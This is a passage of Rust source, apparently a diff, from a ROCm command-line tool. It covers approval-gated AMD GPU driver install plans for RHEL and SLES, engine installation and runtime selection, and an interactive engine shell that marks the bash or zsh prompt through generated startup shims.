true, - mutating: dkms, - policy: "linux_official_amd_dkms_wrapper".to_owned(), - os_id, - version_id, - codename, - repo_version, - reason: if dkms { - "Plan uses AMD's documented SLES DKMS flow and requires explicit approval before execution." - } else { - "DKMS was not requested; this is a non-mutating preflight plan." - } - .to_owned(), - preflight_checks: if dkms { - let mut checks = driver_root_preflight_checks(escalation); - checks.push("`zypper` package manager is available".to_owned()); - checks.push( - "`SUSEConnect` is available and the host is registered before approval".to_owned(), - ); - checks - } else { - Vec::new() - }, - commands, - checks: vec![ - "dkms status amdgpu".to_owned(), - "/sys/module/amdgpu".to_owned(), - "/dev/kfd".to_owned(), - "/dev/dri/renderD*".to_owned(), - "amd-smi version if present".to_owned(), - "rocminfo if present".to_owned(), - ], - // Kernel module: not live until the machine comes back up. - reboot_required: true, - } -} - -fn rhel_kernel_prepare_commands(version_id: &str, escalation: PrivilegeEscalation) -> Vec { - let sudo = escalation.prefix(); - if version_id.starts_with("8.") { - vec![ - format!("{sudo}dnf install -y \"kernel-headers-$(uname -r)\""), - format!("{sudo}dnf install -y \"kernel-devel-$(uname -r)\""), - ] - } else { - vec![ - format!("{sudo}dnf install -y \"kernel-headers-$(uname -r)\""), - format!("{sudo}dnf install -y \"kernel-devel-$(uname -r)\""), - format!("{sudo}dnf install -y \"kernel-devel-matched-$(uname -r)\""), - ] - } -} - -fn amdgpu_install_rpm_url( - repo_version: &str, - package_release: &str, - version_id: &str, - distro: DnfDriverDistro, -) -> String { - let repo_family = match distro { - DnfDriverDistro::Rhel => "rhel", - DnfDriverDistro::Oracle | DnfDriverDistro::Rocky | DnfDriverDistro::Generic => "el", - }; - let repo_version_path = dnf_repo_version_path(version_id); - let el_major = linux_major_version(version_id); - format!( - "https://repo.radeon.com/amdgpu-install/{repo_version}/{repo_family}/{repo_version_path}/amdgpu-install-{repo_version}.{package_release}-1.el{el_major}.noarch.rpm" - ) -} - -fn amdgpu_install_sles_rpm_url( - repo_version: &str, - package_release: &str, - version_id: &str, -) -> String { - format!( - "https://repo.radeon.com/amdgpu-install/{repo_version}/sle/{version_id}/amdgpu-install-{repo_version}.{package_release}-1.noarch.rpm" - ) -} - -fn dnf_repo_version_path(version_id: &str) -> String { - // AMD serves EL 8 and 10 from a major-version path (el8/, el10/, rhel/10/), - // but EL 9 from the point-release path (el/9.7/, rhel/9.6/). Keying on the - // major version keeps this correct for RHEL, Oracle Linux, and ID_LIKE-matched - // rebuilds alike, without depending on the specific distro `ID`. - let major = linux_major_version(version_id); - match major { - "8" | "10" => major.to_owned(), - _ => version_id.to_owned(), - } -} - -fn linux_major_version(version_id: &str) -> &str { - version_id.split('.').next().unwrap_or(version_id) -} - -/// Preconditions about reaching root for a driver plan. -/// -/// These differ by escalation: a plan that will prefix `sudo` additionally -/// depends on a `sudo` binary being installed, while a plan built as root does -/// not. Listing that precondition when already root would state a requirement -/// the plan is not relying on — which is exactly the contradiction that made -/// the unconditional prefix confusing to debug. -fn driver_root_preflight_checks(escalation: PrivilegeEscalation) -> Vec { - let mut checks = - vec!["root access: run as root, or ensure `sudo -v` succeeds before approval".to_owned()]; - if escalation.needs_sudo_binary() { - checks.push("`sudo` command is available when not running as root".to_owned()); - } - checks -} - -fn driver_command(phase: DriverCommandPhase, command: &str) -> DriverPlanCommand { - DriverPlanCommand { - phase, - command: command.to_owned(), - } -} - -/// Resolve a `${VAR:-default}` shell parameter-expansion template to its -/// effective value: the value of `VAR` when it is set and non-empty (matching -/// the shell `:-` semantics), otherwise the literal default. This is resolved -/// once at plan-build time so the concrete value is baked into both the -/// human-readable summary and the commands the plan runs, rather than leaking an -/// unexpanded `${...}` placeholder into user-facing output or depending on the -/// runtime shell — which, for the single-quoted apt `sources.list` line, would -/// never expand it at all. -/// -/// Only a single, flat `${VAR:-default}` template is recognized. Anything else — -/// a bare `${VAR}`, a `${VAR:=x}`/`${VAR-x}` form, or a nested default such as -/// `${A:-${B:-x}}` whose default itself contains `${` — is returned unchanged, so -/// an unresolvable shape degrades to its literal input rather than to a -/// half-resolved string. -fn resolve_shell_default_template(expr: &str) -> String { - let Some(inner) = expr.strip_prefix("${").and_then(|s| s.strip_suffix('}')) else { - return expr.to_owned(); - }; - let Some((var, default)) = inner.split_once(":-") else { - return expr.to_owned(); - }; - if default.contains("${") { - // Nested or embedded templates are beyond this flat matcher; return the - // input untouched rather than emitting a partially resolved string. - return expr.to_owned(); - } - std::env::var(var) - .ok() - .filter(|value| !value.is_empty()) - .unwrap_or_else(|| default.to_owned()) -} - -fn render_driver_install_plan(plan: &DriverInstallPlan, yes: bool, dry_run: bool) -> String { - let mut output = String::new(); - let _ = writeln!(output, "driver install plan"); - let _ = writeln!(output, " policy: {}", plan.policy); - let _ = writeln!(output, " supported: {}", plan.supported); - let _ = writeln!(output, " mutating: {}", plan.mutating); - let _ = writeln!( - output, - " approval: {}", - driver_plan_approval_label(plan, yes, dry_run) - ); - let _ = writeln!(output, " dry_run: {dry_run}"); - let _ = writeln!(output, " os_id: {}", empty_as_unknown(&plan.os_id)); - let _ = writeln!( - output, - " version_id: {}", - empty_as_unknown(&plan.version_id) - ); - let _ = writeln!(output, " codename: {}", empty_as_unknown(&plan.codename)); - let _ = writeln!(output, " repo_version: {}", plan.repo_version); - let _ = writeln!(output, " reason: {}", plan.reason); - if !plan.preflight_checks.is_empty() { - let _ = writeln!(output, " preflight_checks:"); - for check in &plan.preflight_checks { - let _ = writeln!(output, " {check}"); - } - } - let execution_commands = plan - .commands - .iter() - .filter(|command| { - matches!( - command.phase, - DriverCommandPhase::Prepare | DriverCommandPhase::Execute - ) - }) - .collect::>(); - if execution_commands.is_empty() { - let _ = writeln!(output, " execution_commands: "); - } else { - let _ = writeln!(output, " execution_commands:"); - for command in execution_commands { - let _ = writeln!(output, " {:?}: {}", command.phase, command.command); - } - } - let verification_commands = plan - .commands - .iter() - .filter(|command| command.phase == DriverCommandPhase::Verify) - .collect::>(); - // A plan that changes nothing kernel-side is live as soon as it finishes, so - // labelling its checks "post_reboot" would tell the user to reboot for - // nothing — and would contradict the `reboot_required: false` this same plan - // reports after executing. - let checks_label = if plan.reboot_required { - "post_reboot" - } else { - "post_install" - }; - if !verification_commands.is_empty() { - let _ = writeln!(output, " {checks_label}_check_commands:"); - for command in verification_commands { - let _ = writeln!(output, " {}", command.command); - } - } - if !plan.checks.is_empty() { - let _ = writeln!(output, " {checks_label}_checks:"); - for check in &plan.checks { - let _ = writeln!(output, " {check}"); - } - } - if plan.supported && plan.mutating && !yes && !dry_run { - let _ = writeln!( - output, - " action: rerun with --yes after reviewing this plan, or approve from the TUI" - ); - } else if plan.supported && plan.mutating && dry_run { - let _ = writeln!( - output, - " action: dry run only; no driver commands executed" - ); - } else if plan.supported && !plan.mutating { - let _ = writeln!( - output, - " action: no driver commands will be executed; add --dkms to plan a native DKMS driver install" - ); - } else if !plan.supported { - let _ = writeln!(output, " action: no driver commands will be executed"); - } - output -} - -const fn driver_plan_approval_label( - plan: &DriverInstallPlan, - yes: bool, - dry_run: bool, -) -> &'static str { - if !plan.supported || !plan.mutating || dry_run { - "not required" - } else if yes { - "approved" - } else { - "required" - } -} - -const fn empty_as_unknown(value: &str) -> &str { - if value.is_empty() { "" } else { value } -} - -fn parse_os_release_field(text: &str, key: &str) -> Option { - for line in text.lines() { - let Some((name, raw_value)) = line.split_once('=') else { - continue; - }; - if name != key { - continue; - } - return Some(raw_value.trim().trim_matches('"').to_owned()); - } - None -} - -fn codename_for_version(os_id: &str, version_id: &str) -> Option<&'static str> { - match (os_id, version_id) { - ("ubuntu", "22.04") => Some("jammy"), - ("ubuntu", "24.04") => Some("noble"), - ("debian", "12") => Some("jammy"), - ("debian", "13") => Some("noble"), - _ => None, - } -} - -fn read_os_release() -> Result { - fs::read_to_string("/etc/os-release").context("failed to read /etc/os-release") -} - -fn run_driver_shell_command(command: &str) -> Result<()> { - run_shell_command_with_stdin(command, Stdio::null()) -} - -/// Run a hardcoded shell command, wiring its stdin to `stdin`. -/// -/// Most install commands run with a null stdin, but privileged commands that may -/// trigger an interactive `sudo` password prompt (such as the OpenMPI install -/// approved with `--yes`) must inherit the terminal so the user can respond. -fn run_shell_command_with_stdin(command: &str, stdin: Stdio) -> Result<()> { - let (program, args) = shell_command_for_host(command); - let status = ProcessCommand::new(program) - .args(args) - .stdin(stdin) - .status() - .with_context(|| format!("failed to launch `{command}`"))?; - if !status.success() { - bail!("`{command}` exited with {status}"); - } - Ok(()) -} - -/// Run a command given as an argv vector directly, without going through a shell. -/// -/// Used for [`run_system_package_install_plan`], whose commands are modeled as -/// argv vectors so no shell quoting or `sudo`-prefix string handling is needed. -fn run_argv_with_stdin(argv: &[String], stdin: Stdio) -> Result<()> { - let (program, args) = argv - .split_first() - .context("install command has no program to run")?; - let status = ProcessCommand::new(program) - .args(args) - .stdin(stdin) - .status() - .with_context(|| format!("failed to launch `{}`", argv.join(" ")))?; - if !status.success() { - bail!("`{}` exited with {status}", argv.join(" ")); - } - Ok(()) -} - -fn driver_install_state_path(paths: &AppPaths) -> PathBuf { - paths.data_dir.join("driver").join("state.json") -} - -fn write_driver_install_state(paths: &AppPaths, state: &DriverInstallState) -> Result<()> { - let path = driver_install_state_path(paths); - let parent = path.parent().context("driver state path has no parent")?; - fs::create_dir_all(parent)?; - fs::write(&path, serde_json::to_vec_pretty(state)?)?; - Ok(()) -} - -fn read_driver_install_state(paths: &AppPaths) -> Result> { - let path = driver_install_state_path(paths); - if !path.is_file() { - return Ok(None); - } - let bytes = fs::read(&path).with_context(|| format!("failed to read {}", path.display()))?; - let state = serde_json::from_slice(&bytes) - .with_context(|| format!("failed to parse {}", path.display()))?; - Ok(Some(state)) -} - -fn current_boot_id() -> Option { - fs::read_to_string("/proc/sys/kernel/random/boot_id") - .ok() - .map(|value| value.trim().to_owned()) - .filter(|value| !value.is_empty()) -} - -fn driver_reboot_observed(executed_boot_id: Option<&str>) -> bool { - let Some(executed_boot_id) = executed_boot_id else { - return false; - }; - current_boot_id() - .as_deref() - .is_some_and(|current| current != executed_boot_id) -} - -fn engines(command: EnginesCommand) -> Result<()> { - match command { - EnginesCommand::List => { - print!("{}", render_engine_inventory_text()); - Ok(()) - } - EnginesCommand::Install { - engine, - runtime_id, - python_version, - reinstall, - yes, - } => { - let paths = AppPaths::discover()?; - let mut config = RocmCliConfig::load(&paths)?; - let runtime_id = - resolve_engine_install_runtime_id(&paths, &config, &engine, runtime_id)?; - let env_root = env_root_for_engine_install(&paths, &config, &engine, &runtime_id)?; - if engine == "vllm" { - ensure_openmpi_for_vllm(yes)?; - ensure_libatomic_for_torch(yes); - ensure_libnuma_for_torch(yes); - } - let response = engine_request_with_env_root::<_, InstallResponse>( - Some(&paths), - &engine, - EngineMethod::Install, - &InstallRequest { - runtime_id: runtime_id.clone(), - python_version, - reinstall, - env_root: env_root.clone(), - }, - env_root.as_deref(), - )?; - println!("engine install"); - println!(" engine: {engine}"); - println!(" runtime_id: {runtime_id}"); - println!(" reinstall: {reinstall}"); - println!(" env_id: {}", response.env_id); - println!(" env_path: {}", response.env_path); - for warning in &response.warnings { - println!(" warning: {warning}"); - } - if response.managed_env == Some(false) { - println!(" note: external runtime"); - } else { - let engine_config = config.engine_config_mut(&engine); - engine_config.last_installed_runtime_id = Some(runtime_id.clone()); - engine_config.last_installed_env_id = Some(response.env_id.clone()); - let mut seeded_preference = false; - if engine_config.preferred_runtime_id.is_none() - && engine_config.preferred_env_id.is_none() - { - engine_config.preferred_env_id = Some(response.env_id.clone()); - seeded_preference = true; - } - config.save(&paths)?; - let _ = seeded_preference; - } - // Settle last, matching `maybe_auto_install_sdk_preferred_engine`. The - // check blocks then print under the `engine:`/`runtime_id:`/`env_id:` - // lines they describe instead of above them, and the config bookkeeping - // above still lands when settling fails — the engine did install; it is - // the runtime it left behind that is being reported on. - settle_engine_install(&paths, &engine, &runtime_id, &response)?; - record_cli_audit_event( - &paths, - "engine", - "engine_install", - "info", - format!( - "installed engine={} runtime_id={} env_id={} reinstall={}", - engine, runtime_id, response.env_id, reinstall - ), - None, - ); - Ok(()) - } - EnginesCommand::Shell { - engine, - runtime_id, - env_id, - shell, - } => engine_shell( - &engine, - runtime_id.as_deref(), - env_id.as_deref(), - shell.as_deref(), - ), - } -} - -fn resolve_engine_install_runtime_id( - paths: &AppPaths, - config: &RocmCliConfig, - engine: &str, - runtime_id: Option, -) -> Result { - if engine_manages_own_runtime(engine) { - return Ok(runtime_id.unwrap_or_else(|| managed_engine_runtime_id(engine))); - } - let Some(selector) = runtime_id - .or_else(|| config.active_runtime_key.clone()) - .or_else(|| config.default_runtime_id.clone()) - else { - bail!( - "no active ROCm runtime is configured; run `rocm runtimes list` and `rocm runtimes activate `, or pass --runtime-id" - ); - }; - resolve_runtime_selector_to_exact_key(paths, &selector, "engine install runtime selection") -} - -fn engine_manages_own_runtime(engine: &str) -> bool { - engine == "lemonade" -} - -fn env_root_for_runtime( - paths: &AppPaths, - engine: &str, - runtime_id: &str, -) -> Result> { - if engine_manages_own_runtime(engine) { - return Ok(None); - } - let manifests = therock::load_runtime_manifests(paths)?; - let manifest = select_runtime_manifest(&manifests, runtime_id)?; - Ok(Some(manifest.install_root.join("engines"))) -} - -fn env_root_for_engine_install( - paths: &AppPaths, - config: &RocmCliConfig, - engine: &str, - runtime_id: &str, -) -> Result> { - if engine_manages_own_runtime(engine) { - return env_root_for_self_managed_engine(paths, config); - } - env_root_for_runtime(paths, engine, runtime_id) -} - -fn env_root_for_self_managed_engine( - paths: &AppPaths, - config: &RocmCliConfig, -) -> Result> { - recover_setup_runtime_registration(paths, config)?; - let manifests = therock::load_runtime_manifests(paths)?; - for selector in [ - config.active_runtime_key.as_deref(), - config.default_runtime_id.as_deref(), - ] - .into_iter() - .flatten() - { - if let Some(manifest) = runtime_manifest_for_selector(&manifests, selector) { - return Ok(Some(manifest.install_root.join("engines"))); - } - } - let ready = manifests - .iter() - .filter(|manifest| validate_runtime_manifest_for_activation(manifest).is_ok()) - .collect::>(); - Ok(match ready.as_slice() { - [manifest] => Some(manifest.install_root.join("engines")), - _ => None, - }) -} - -fn runtime_manifest_for_selector<'a>( - manifests: &'a [therock::InstalledRuntimeManifest], - selector: &str, -) -> Option<&'a therock::InstalledRuntimeManifest> { - manifests - .iter() - .find(|manifest| manifest.runtime_key.eq_ignore_ascii_case(selector)) - .or_else(|| { - let mut matches = manifests - .iter() - .filter(|manifest| manifest.runtime_id.eq_ignore_ascii_case(selector)); - let first = matches.next()?; - if matches.next().is_none() { - Some(first) - } else { - None - } - }) -} - -/// The `runtime_key` of the runtime whose install root contains `python`. -fn runtime_key_for_python(paths: &AppPaths, python: &Path) -> Option { - let manifests = therock::load_runtime_manifests(paths).ok()?; - runtime_key_owning_python(&manifests, python).map(str::to_owned) -} - -/// Which runtime owns an interpreter, decided by install root. -/// -/// Split from the registry read so the decision can be tested without a -/// registry on disk, matching `sdk_torch_build_from_manifest`. -/// -/// `runtime_id` cannot answer this: it is shared by every side-by-side install -/// of one channel and family, which is exactly the situation an engine install -/// has to be attributed in. An install root contains one runtime by -/// construction, so the interpreter's path settles it. -/// -/// Both sides are compared verbatim *and* canonicalized. The CLI writes -/// `install_root` canonicalized while an engine adapter reports back whatever -/// path it was handed, and comparing a single form makes ownership fail -/// silently on a symlinked runtimes directory. Roots can nest, so the longest -/// containing root wins. -fn runtime_key_owning_python<'a>( - manifests: &'a [therock::InstalledRuntimeManifest], - python: &Path, -) -> Option<&'a str> { - fn both_forms(path: &Path) -> Vec { - let verbatim = path.to_path_buf(); - match path.canonicalize() { - Ok(resolved) if resolved != verbatim => vec![verbatim, resolved], - _ => vec![verbatim], - } - } - - let pythons = both_forms(python); - manifests - .iter() - .filter(|manifest| { - both_forms(&manifest.install_root) - .iter() - .any(|root| pythons.iter().any(|python| python.starts_with(root))) - }) - .max_by_key(|manifest| manifest.install_root.as_os_str().len()) - .map(|manifest| manifest.runtime_key.as_str()) -} - -fn env_root_for_service( - paths: &AppPaths, - engine: &str, - runtime_id: Option<&str>, - env_id: Option<&str>, -) -> Result> { - if env_id.is_some() { - return Ok(None); - } - match runtime_id { - Some(runtime_id) => env_root_for_runtime(paths, engine, runtime_id), - None => Ok(None), - } -} - -/// Label recorded for the runtime a self-managing engine installs for itself. -/// -/// For `lemonade` this must be the `env_id` its adapter reports, which is -/// derived from the single Lemonade pin — it was previously a hand-written -/// literal and had drifted several minor versions behind what is installed. -fn managed_engine_runtime_id(engine: &str) -> String { - match engine { - "lemonade" => format!("lemonade-embeddable-{}", rocm_deps::LEMONADE_VERSION), - _ => "managed-engine-runtime".to_owned(), - } -} - -fn ensure_self_managed_engine_ready( - paths: &AppPaths, - config: &mut RocmCliConfig, - engine: &str, -) -> Result<()> { - if !engine_manages_own_runtime(engine) { - return Ok(()); - } - let runtime_id = managed_engine_runtime_id(engine); - let env_root = env_root_for_self_managed_engine(paths, config)?; - let detect = engine_request::<_, DetectResponse>( - Some(paths), - engine, - EngineMethod::Detect, - &DetectRequest { - runtime_id: Some(runtime_id.clone()), - device_filter: None, - }, - ) - .ok(); - // For a self-managing engine the runtime id *is* the env id its adapter - // reports for the pinned version, so a version bump leaves an older - // install detected-but-not-current. Requiring the ids to match makes the - // bump trigger an install instead of silently keeping the old runtime. - let installed = detect.as_ref().is_some_and(|detect| { - detect.installed - && detect.env_id.as_deref() == Some(runtime_id.as_str()) - && detect_runtime_matches_env_root(detect, env_root.as_deref()) - }); - let response = if installed { - None - } else { - eprintln!("Preparing {engine} for GPU serving..."); - let response = engine_request_with_env_root::<_, InstallResponse>( - Some(paths), - engine, - EngineMethod::Install, - &InstallRequest { - runtime_id: runtime_id.clone(), - python_version: None, - reinstall: false, - env_root: env_root.clone(), - }, - env_root.as_deref(), - )?; - // No `settle_engine_install` here. This function returns at the top unless - // `engine_manages_own_runtime(engine)`, and that is exactly the case - // `settles_runtime_torch` declines: the runtime holds the engine's own - // binary, not an interpreter with a torch in it. Calling it would be inert - // at best, and a call that provably cannot act invites someone to "fix" the - // gate later. - Some(response) - }; - - let engine_config = config.engine_config_mut(engine); - engine_config.last_installed_runtime_id = Some(runtime_id); - if let Some(response) = response { - engine_config.last_installed_env_id = Some(response.env_id.clone()); - if engine_config.preferred_runtime_id.is_none() && engine_config.preferred_env_id.is_none() - { - engine_config.preferred_env_id = Some(response.env_id); - } - } - config.save(paths)?; - Ok(()) -} - -fn detect_runtime_matches_env_root(detect: &DetectResponse, env_root: Option<&Path>) -> bool { - let Some(env_root) = env_root else { - return true; - }; - detect - .runtime_executable - .as_deref() - .map(PathBuf::from) - .is_some_and(|runtime_executable| path_is_same_or_inside(&runtime_executable, env_root)) -} - -#[derive(Debug, Clone, Deserialize)] -struct ManagedEngineEnvManifest { - env_id: String, - runtime_id: String, - python_executable: String, - env_path: PathBuf, -} - -#[derive(Debug, Clone)] -struct ResolvedEngineEnv { - env_id: String, - runtime_id: String, - python_executable: String, - env_path: PathBuf, - source: String, -} - -/// Extra argv, environment, and files needed to make a spawned shell *look* -/// like a managed engine shell. -#[derive(Debug, Clone, PartialEq, Eq)] -struct ShellPromptShim { - /// Appended to the shell's argv. - args: Vec, - /// Added to the child environment. - envs: Vec<(String, String)>, - /// Written before the shell starts, as (path, contents). - files: Vec<(PathBuf, String)>, -} - -/// Work out how to mark `shell_program`'s prompt with `prompt`. -/// -/// Passing the marker through the `PS1` *environment variable* does not work: -/// bash assigns `PS1` from `/etc/bash.bashrc` and `~/.bashrc` on every -/// interactive start, so the inherited value is overwritten and the engine shell -/// ends up looking exactly like the shell it was launched from. The marker has to -/// be applied from inside the shell's own startup, after the user's files have -/// run — which is what these shims do. -/// -/// Pure: decides *what* to write and *how* to invoke, and leaves the I/O to the -/// caller so the decision can be unit-tested. Returns `None` for shells that -/// cannot be marked safely; the caller's handover banner covers those instead of -/// this failing. -/// -/// `original_zdotdir` is the caller's `ZDOTDIR`, if it had one, so the zsh shim -/// can still find the user's real startup files after we redirect `ZDOTDIR` at -/// our own directory. -fn engine_shell_prompt_shim( - shell_program: &str, - prompt: &str, - shim_dir: &Path, - original_zdotdir: Option<&str>, -) -> Option { - // Match on the file stem so `--shell /usr/bin/zsh` and a bare `bash` behave - // the same. `bash5`-style names are deliberately not matched: guessing wrong - // is worse than falling back to the banner. - let stem = Path::new(shell_program) - .file_stem() - .and_then(std::ffi::OsStr::to_str)? - .to_ascii_lowercase(); - - match stem.as_str() { - "bash" => { - let rcfile = shim_dir.join("engine-shell.bash"); - // `--rcfile` replaces ~/.bashrc ONLY -- bash still sources - // /etc/bash.bashrc itself, so sourcing that here would apply it twice. - let contents = format!( - "# Generated by `rocm engines shell`. Sources your own startup file\n\ - # first, then marks the prompt so this shell is distinguishable.\n\ - if [ -r \"$HOME/.bashrc\" ]; then . \"$HOME/.bashrc\"; fi\n\ - PS1='{prompt}'\"$PS1\"\n" - ); - Some(ShellPromptShim { - args: vec![ - "--rcfile".to_owned(), - rcfile.display().to_string(), - "-i".to_owned(), - ], - envs: Vec::new(), - files: vec![(rcfile, contents)], - }) - } - "zsh" => { - // Redirecting ZDOTDIR makes zsh skip the user's `.zshenv` AND their - // `.zshrc`. Losing `.zshenv` would silently strip their PATH and - // exports -- a worse bug than the unmarked prompt -- so both are - // restored, and the original location is passed through for the shim - // to read at startup. - let user_zdotdir = "${ROCM_CLI_ORIG_ZDOTDIR:-$HOME}"; - let zshenv = format!( - "# Generated by `rocm engines shell`; restores your own .zshenv.\n\ - __rocm_zdotdir=\"{user_zdotdir}\"\n\ - [ -r \"$__rocm_zdotdir/.zshenv\" ] && . \"$__rocm_zdotdir/.zshenv\"\n" - ); - let zshrc = format!( - "# Generated by `rocm engines shell`. Sources your own .zshrc first,\n\ - # then marks the prompt so this shell is distinguishable.\n\ - __rocm_zdotdir=\"{user_zdotdir}\"\n\ - [ -r \"$__rocm_zdotdir/.zshrc\" ] && . \"$__rocm_zdotdir/.zshrc\"\n\ - PROMPT='{prompt}'$PROMPT\n" - ); - let mut envs = vec![("ZDOTDIR".to_owned(), shim_dir.display().to_string())]; - if let Some(original) = original_zdotdir.filter(|value| !value.trim().is_empty()) { - envs.push(("ROCM_CLI_ORIG_ZDOTDIR".to_owned(), original.to_owned())); - } - Some(ShellPromptShim { - args: Vec::new(), - envs, - files: vec![ - (shim_dir.join(".zshenv"), zshenv), - (shim_dir.join(".zshrc"), zshrc), - ], - }) - } - // fish, sh, dash, cmd, PowerShell, anything else: no safe way to inject a - // marker without taking over startup, so the banner carries the message. - _ => None, - } -} - -/// Write a [`ShellPromptShim`]'s files, creating the directory if needed. -/// -/// The files live under the app's own engine state directory rather than a temp -/// dir: they must outlive this process's setup and stay readable for the whole -/// life of the spawned shell, and a fixed path is regenerated on every run -/// instead of accumulating. -fn write_engine_shell_shim(shim_dir: &Path, shim: &ShellPromptShim) -> Result<()> { - fs::create_dir_all(shim_dir) - .with_context(|| format!("failed to create {}", shim_dir.display()))?; - for (path, contents) in &shim.files { - fs::write(path, contents).with_context(|| format!("failed to write {}", path.display()))?; - } - Ok(()) -} - -fn engine_shell( - engine: &str, - runtime_id: Option<&str>, - env_id: Option<&str>, - shell_override: Option<&str>, -) -> Result<()> { - if !interactive_terminal() { - bail!("`rocm engines shell` requires an interactive terminal"); - } - - let paths = AppPaths::discover()?; - let config = RocmCliConfig::load(&paths)?; - let resolved = resolve_engine_env(&paths, &config, engine, runtime_id, env_id)?; - let shell_program = shell_override - .map(str::to_owned) - .or_else(default_interactive_shell_program) - .context("unable to determine an interactive shell; set --shell or SHELL")?; - let venv_bin = runtime_python_env_bin_dir(&resolved.env_path); - let shell_hint = runtime_python_activation_hint(&resolved.env_path); - - println!("engine shell"); - println!(" engine: {engine}"); - println!(" source: {}", resolved.source); - println!(" env_id: {}", resolved.env_id); - println!(" runtime_id: {}", resolved.runtime_id); - println!(" env_path: {}", resolved.env_path.display()); - println!(" python: {}", resolved.python_executable); - println!(" shell: {shell_program}"); - println!(" activate_hint: {shell_hint}"); - println!(" exit_hint: use `exit` or Ctrl-D to leave the managed env shell"); - - let path_with_env = prepend_runtime_path(&venv_bin, std::env::var_os("PATH").as_deref()) - .context("failed to compose PATH for managed engine env shell")?; - let mut command = ProcessCommand::new(&shell_program); - command - .stdin(Stdio::inherit()) - .stdout(Stdio::inherit()) - .stderr(Stdio::inherit()) - .env("VIRTUAL_ENV", &resolved.env_path) - .env("PATH", path_with_env) - .env("ROCM_CLI_ENGINE", engine) - .env("ROCM_CLI_ENV_ID", &resolved.env_id) - .env("ROCM_CLI_RUNTIME_ID", &resolved.runtime_id) - .env("ROCM_CLI_PYTHON", &resolved.python_executable); - apply_app_path_env(&mut command, &paths); - - let prompt = format!("(rocm:{engine}) "); - let mut prompt_marked = false; - if !rocm_core::runtime_is_windows() { - // Kept for prompt frameworks (starship, powerlevel10k, oh-my-posh) that - // read this directly -- that is why the missing marker went unnoticed by - // anyone using one. Plain bash/zsh need the shim below. - command.env("VIRTUAL_ENV_PROMPT", &prompt); - - let shim_dir = paths.engine_state_dir(engine).join("shell"); - // `engine` is constrained by clap to the supported-engine list, so the - // prompt cannot carry shell metacharacters into the generated files. - if let Some(shim) = engine_shell_prompt_shim( - &shell_program, - &prompt, - &shim_dir, - std::env::var("ZDOTDIR").ok().as_deref(), - ) { - // A shim that cannot be written is not worth failing the command over - // -- the shell still works, it just looks unmarked, and the banner - // below adapts to say so. - match write_engine_shell_shim(&shim_dir, &shim) { - Ok(()) => { - command.args(&shim.args); - for (key, value) in &shim.envs { - command.env(key, value); - } - prompt_marked = true; - } - Err(error) => { - eprintln!("warning: could not prepare the engine shell prompt: {error}"); - } - } - } - - if !prompt_marked { - // Shells we have no shim for (sh, dash) do honour an inherited PS1, so - // this is still worth setting -- but as a self-contained value. The - // previous `{prompt}${PS1:-}` referred to the variable being assigned, - // which dash expanded into itself and rendered as - // `(rocm:vllm) (rocm:vllm) ${PS1:-}`. Shells that ignore PS1 entirely - // (fish) are unaffected either way. - command.env("PS1", format!("{prompt}$ ")); - } - } - - // The block above describes the environment; this is the handover. Without - // it, a shell we could not mark is indistinguishable from the parent and - // reads as "the command only printed information" -- which is how this was - // reported. - println!(); - if prompt_marked { - println!("Entering the {engine} engine shell — your prompt is now prefixed {prompt}"); - } else { - println!( - "Entering the {engine} engine shell — your prompt may look unchanged; \ - run `echo $ROCM_CLI_ENGINE` to confirm you are inside it." - ); - } - println!("Run `exit` (or Ctrl-D) to return to your previous shell."); - - let status = command - .status() - .with_context(|| format!("failed to launch shell `{shell_program}`"))?; - if status.success() { - Ok(()) - } else { - bail!("managed engine shell exited with status {status}"); - } -} - -fn resolve_engine_env( - paths: &AppPaths, - config: &RocmCliConfig, - engine: &str, - runtime_id: Option<&str>, - env_id: Option<&str>, -) -> Result { - let selection = validate_engine_selection_runtime( - paths, - resolve_engine_selection(config, engine, runtime_id, env_id), - )?; - if let Some(env_id) = selection.env_id.as_deref() { - let manifest = load_engine_env_manifest(paths, engine, env_id)?; - return Ok(ResolvedEngineEnv { - env_id: manifest.env_id, - runtime_id: manifest.runtime_id, - python_executable: manifest.python_executable, - env_path: manifest.env_path, - source: selection - .source - .unwrap_or_else(|| "manifest_env_id".to_owned()), - }); - } - - let runtime_id = selection.runtime_id.with_context(|| { - "no active ROCm runtime is configured; run `rocm runtimes list` and `rocm runtimes activate `, or pass --runtime-id" - })?; - let env_root = env_root_for_engine_install(paths, config, engine, &runtime_id)?; - let response = engine_request_with_env_root::<_, InstallResponse>( - Some(paths), - engine, - EngineMethod::Install, - &InstallRequest { - runtime_id: runtime_id.clone(), - python_version: None, - reinstall: false, - env_root: env_root.clone(), - }, - env_root.as_deref(), - )?; - settle_engine_install(paths, engine, &runtime_id, &response)?; - Ok(ResolvedEngineEnv { - env_id: response.env_id, - runtime_id, - python_executable: response.python_executable, - env_path: PathBuf::from(response.env_path), - source: selection - .source - .unwrap_or_else(|| "auto_install".to_owned()), - }) -} - -fn load_engine_env_manifest( - paths: &AppPaths, - engine: &str, - env_id: &str, -) -> Result { - let path = paths - .engine_manifests_dir(engine) - .join(format!("{env_id}.json")); - let bytes = fs::read(&path).with_context(|| format!("failed to read {}", path.display()))?; - serde_json::from_slice(&bytes).with_context(|| format!("failed to parse {}", path.display())) -} - -#[derive(Debug, Clone, Eq, PartialEq)] -struct ServeEngineSelection { - engine: String, - source: &'static str, -} - -fn select_serve_engine( - explicit_engine: Option<&str>, - configured_default: Option<&str>, - recipe: Option<&ModelRecipeRecord>, - host_gpu_summary: Option<&rocm_core::HostGpuSummary>, -) -> ServeEngineSelection { - if let Some(engine) = explicit_engine.filter(|value| !value.trim().is_empty()) { - return ServeEngineSelection { - engine: engine.to_owned(), - source: "explicit --engine", - }; - } - - if let Some(engine) = configured_default.filter(|value| !value.trim().is_empty()) { - return ServeEngineSelection { - engine: engine.to_owned(), - source: "configured default_engine", - }; - } - - if let Some(engine) = host_gpu_summary.and_then(preferred_serve_engine_for_host_gpu_summary) { - // Only honor the GPU preference when the model's recipe can actually run on - // that engine. A recipe that exists but does not support the preferred engine - // (for example a GGUF model that only Lemonade can serve) must fall through to - // its own preferred engine instead of being forced onto an incompatible engine. - let recipe_supports_preferred = - recipe.is_none_or(|recipe| model_recipe_supports_engine(recipe, engine)); - if recipe_supports_preferred { - return ServeEngineSelection { - engine: engine.to_owned(), - source: "detected ROCm GPU family prefers vLLM", - }; - } - } - - if let Some(engine) = recipe - .and_then(|recipe| recipe.preferred_engines.first()) - .filter(|value| !value.trim().is_empty()) - { - return ServeEngineSelection { - engine: engine.to_owned(), - source: "recipe preferred engine; pass --engine to override; no automatic fallback", - }; - } - - ServeEngineSelection { - engine: default_engine_for_platform().to_owned(), - source: 